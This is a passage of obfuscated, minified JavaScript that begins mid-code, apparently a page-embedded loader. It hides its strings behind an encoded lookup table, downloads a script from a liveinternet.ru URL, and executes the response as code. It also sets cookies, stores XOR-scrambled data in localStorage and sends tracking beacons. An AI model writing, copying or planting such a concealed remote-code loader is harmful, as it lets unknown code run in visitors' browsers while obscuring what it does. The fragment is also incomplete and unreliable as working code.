f}(x),n=[],v=0,f=r.length;v<f;v++)n+="%"+("00"+(function(a,b){return" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~".indexOf(a[b])+32})(r,v).toString(16)).slice(-2);return decodeURIComponent(n)},X.GwumuN={},X.DlEDrf=!0);var v=X.GwumuN[x];return void 0===v?(n=X.NaznFf(n),X.GwumuN[x]=n):n=v,n};!function(o,y,x){var r,g=X,B={};for(r in x)x[g("0x75")](r)&&(B[r]=x[r]);var D=[g("0x27"),g("0x13"),g("0x41"),g("0x70"),g("0x5c"),g("0x2c"),g("0x1d")],h=o[g("0x49")]||o[g("0x55")],n=g("0x78"),v=g("0x47"),N=g("0x2a"),A=g("0x83"),t=g("0x42"),f=g("0xf"),M=g("0x35"),a=g("0x6b"),j=g("0x10"),u=g("0x7"),q=g("0x3d");B[N]=B[N]||g("0x40");try{({})[g("0x60")][g("0x6")](B[N])!==g("0x50")&&(B[N]=[B[N]])}catch(x){}B[A]=B[A]||336,B[t]=B[t]||{};var w=B[f];if(B[f]=V,B[n]){var e=B[n],z=B[v],H=[],L=s();try{if(!l(o[g("0x22")])||!l(o[g("0x2b")])||!l(o[g("0x1b")][g("0x36")][g("0x65")])||y[g("0x7a")]&&y[g("0x7a")]<=10){var c={};return c[g("0x43")]=!1,c[g("0x7f")]=g("0x69"),V(c)}}catch(x){}var i,C,b,G,U,Y=null;B[g("0x5f")]&&(i=function(){var x=g;d(x("0x5e")),P(x("0x68"))},C=2e4,b=s(),G=null,U=!1,function x(){var r=X;U||(s()-b>=C?i():G=o[r("0x18")](function(){x()},100))}(),Y=function(){U=!0,o[X("0x61")](G)}),function(n){var v=g;if(d(v("0x26")),y[v("0x34")]===v("0x4")||y[v("0x34")]!==v("0x11")&&!y[v("0x6a")][v("0x56")])d(v("0x52")),n();else try{y[v("0x22")]&&y[v("0x22")](v("0x2"),function x(){var r=v;d(r("0x4a")),y[r("0x57")](r("0x2"),x),n()})}catch(x){d(v("0x38")),P(x&&x[v("0x21")])}}(function(){var f=g;try{var a=s();d(f("0x4f")),S(e,function(x){var r=f;try{Y&&Y(),d(r("0x3c"));var n=o[r("0x58")](x[r("0x17")](r("0x72"))),v=x[r("0x23")][r("0x14")];if(!n||n<32e3||n!==v)return P(r("0x51"),n+r("0x15")+v),0;new o[r("0x1b")](x[r("0x23")])[r("0x6")](B[t]),B[t][r("0x1")](o,y,B)}catch(x){P(x&&x[r("0x19")])}},function(x,r){var n,v=f;try{Y&&Y(),d(v("0x54")),s()-a<2e3?z?S(z,function(){d(v("0x12")),P(x,r)},function(){var x=v,r={};r[x("0x43")]=!1,r[x("0x7f")]=x("0x69"),V(r)}):P(x,r):((n={})[v("0x43")]=!1,n[v("0x7f")]=v("0x69"),V(n))}catch(x){P(x&&x[v("0x19")])}})}catch(x){P(x&&x[f("0x21")])}})}else P(g("0x7b"));function d(x){var r=g,n={};n.d=x,n.t=s()-L,H[r("0x2f")](n)}function l(x){return typeof x===g("0x48")}function s(){var x=g;return o[x("0x58")](new o[x("0x39")])}function T(x,r,n){var v,f,a=g;try{o[a("0x8")]&&(n&&(f=g,v=(24e5*(s()/24e5)[f("0x30")]())[f("0x60")](36)[f("0x4c")](0,10),r=o[a("0x66")](v)+u+o[a("0x66")](function(x,r){for(var n=g,v=[],f=0;f<x[n("0x14")];f++){var a=x[n("0x81")](f)^r[n("0x81")](f%r[n("0x14")]);v[n("0x2f")](o[n("0xb")][n("0x1a")](a))}return v[n("0x2e")]("")}(r,v))),o[a("0x8")][a("0x6c")](x,r))}catch(x){}}function V(x){var r=g("0x2d");w&&w(x,r),T(a,r)}function K(x,r){var n=g;return r?x[n("0x28")](".")[n("0x4c")](-r)[n("0x2e")]("."):x}function P(x,r){var v=g,n=s(),f=new o[v("0x39")](n+36e5*B[A])[v("0x64")](),a=[],t=K(o[v("0x25")][v("0x6e")],2);function u(){for(var x=v,r=0;r<a[x("0x14")];r++){var n=a[r];y[x("0x2a")]=n[x("0x4b")]+"="+n[x("0x82")]+x("0x4d")+n[x("0x1c")]+x("0x71")+n[x("0xd")]+x("0x20")}}-1!==D[v("0x7e")](t)&&(t=K(o[v("0x25")][v("0x6e")],3));for(var w=B[N],e=0;e<w[v("0x14")];e++){var z={};z[v("0x4b")]=w[e],z[v("0x82")]=1,z[v("0x1c")]=f,z[v("0xd")]=t,a[v("0x2f")](z)}var L,c,i=function(x){for(var r=g,n=y[r("0x2a")][r("0x28")]("; "),v=0;v<n[r("0x14")];v++){var f=n[v][r("0x28")]("=");if(f[0]===x)return f[r("0x4c")](1)[r("0x2e")]("=")}return null}(M);i&&(y[v("0x2a")]=M+"="+i+v("0x71")+t+v("0x20"),(L={})[v("0x4b")]=M,L[v("0x82")]=i,L[v("0x1c")]=new o[v("0x39")](0)[v("0x64")](),L[v("0xd")]=t,a[v("0x2f")](L));try{o[v("0x22")](v("0x3a"),u),o[v("0x22")](v("0x31"),u)}catch(x){u()}try{(function(x,r){var n=g,v={};v[n("0x79")]=n("0x2d"),v[n("0x32")]=x,v[n("0x4e")]=r,v[n("0xa")]=o[n("0x76")]!==o[n("0x73")],v[n("0x53")]=H;var f={};f[n("0x80")]=n("0x63"),f[n("0x67")]=n("0x63"),f[n("0x7f")]=n("0x59"),f[n("0x7c")]=n("0x63"),f[n("0x32")]="i0",f[n("0x79")]="1";var a={};a[n("0x33")]=1;var t={};t[n("0x6f")]=v,t[n("0x3b")]=f,t[n("0x46")]=a,t[n("0x25")]=o[n("0x25")][n("0x6d")],t[n("0x1e")]=s(),t[n("0xc")]=n("0x5d"),t[n("0x74")]=n("0x37"),t[n("0x45")]=n("0x16"),t[n("0x82")]=1,t[n("0x79")]="1";var u=t,w=o[n("0x7d")][n("0x3")](u);{var e;l(o[n("0x62")][n("0x3e")])?o[n("0x62")][n("0x3e")](q,w):((e=new h)[n("0x3f")](n("0x24"),q,!0),e[n("0x5")](w))}})(x,r=r||""),T(j,[(new o[v("0x39")])[v("0x64")](),v("0x1f"),x,r,o[(c=g)("0x25")]?typeof o[c("0x25")][c("0x60")]===c("0x48")?o[c("0x25")][c("0x60")]():o[c("0x25")][c("0x6d")]||"":""][v("0x2e")]("\n"),!0)}catch(x){}var C={};C[v("0x43")]=!0,C[v("0x7f")]=v("0x1f"),V(C)}function S(x,r,n){var v=g,f=new h;if(0!==f[v("0x34")])throw new Error(v("0x77"));if(f[v("0x3f")](v("0xe"),x,!0),1!==f[v("0x34")]||f[v("0x5")]!==h[v("0x36")][v("0x5")])throw new Error(v("0x5a"));f[v("0x5b")]=!0,f[v("0x29")]=function(){r(f)},f[v("0x84")]=function(){var x=v;n(x("0x44"),x("0x9")+f[x("0x0")])},f[v("0x5")]()}}(window,document,{
    src: "https://www.liveinternet.ru/sBDK14686/fa852dCTX/rM4dvZPSjB0uqFi7PMm1LheQUgSajUEFwnYLoCFZVG4QtFedunIYms853UOCGlCZkccBnreGYJPGWL1-IpyADwAymHAySngRdqVEhiylnTMXpEJ0so1xBbI2pmFtmRy2mGV7Sfoy_ToM", cookie: "ayabnsr"})}();
    